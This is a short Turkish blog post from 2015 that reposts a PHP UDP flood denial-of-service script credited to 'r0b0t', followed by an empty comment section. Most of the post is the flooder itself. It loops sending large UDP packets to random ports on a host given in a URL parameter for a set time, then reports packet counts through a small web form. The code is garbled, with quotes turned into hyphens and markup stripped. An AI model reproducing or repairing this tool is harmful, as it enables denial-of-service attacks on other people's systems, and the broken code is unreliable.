11 Mayıs 2015 Pazartesi

Php DdoS r0b0t’s Udp Flooding v0.1

PHP Kod:
#---------------------------------------------------------------# #     Powered By r0b0t's # #     By r0b0t's # #     wWw.xrobot.mobi # #     V01 # #     r-b0t's # #     03/2011 # ---------------------------------------------------------------# r0b0t Dd0s Php V.01
-; $max_time = $time+$exec_time;   $host = $_GET['host'];   for($i=0;$i<65553;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $rand = rand(1,65553); $fp = fsockopen('udp://-.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } }     echo -
UDP Flood
Completed with $packets (- . round(($packets*65)/1024, 2) . - MB) packets averaging -. round($packets/$exec_time, 2) . - packets per second \n"; echo -

Host:

Length (seconds):


-; }else{ echo -
UDP Flooding
Host:

Length (seconds):



-; } ?>
- See more at: http://www.exploit-id.com/dospoc/php-ddos-r0b0ts-udp-flooding-v0-1#sthash.MxpXQIAA.dpuf 

0 yorum:

Yorum Gönder